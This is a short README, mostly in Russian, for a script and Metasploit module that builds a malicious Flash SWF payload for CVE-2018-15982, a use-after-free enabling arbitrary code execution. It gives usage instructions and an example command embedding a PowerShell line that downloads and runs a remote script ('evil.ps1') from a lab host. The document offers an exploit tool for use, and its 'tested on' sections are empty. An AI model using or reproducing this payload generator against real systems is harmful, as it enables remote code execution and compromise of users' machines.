
Script and metasploit module for CVE-2018-15982
Этот скрипт создает swf-нагрузку для CVE-2018-15982, основанную на PoC из https://github.com/smgorelik/Windows-RCE-exploits. Уязвимость была обнаружена Chenming Xu и Ed Miles из Gigamon ATR.
Уязвимость представляет собой ошибку типа use-after-free, позволяющую выполнить произвольный код в Flash. Дополнительную информацию можно найти по ссылкам ниже.
Примечание: в настоящее время происходит распыление только одного блока — я заметил это после создания скрипта.
Использование:
python create_swf.py <команда> <имя выходного файла>
Пример использования:
python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf
Протестировано на:
Создание нагрузки:

Выполнение нагрузки:

Подтверждение выполнения:

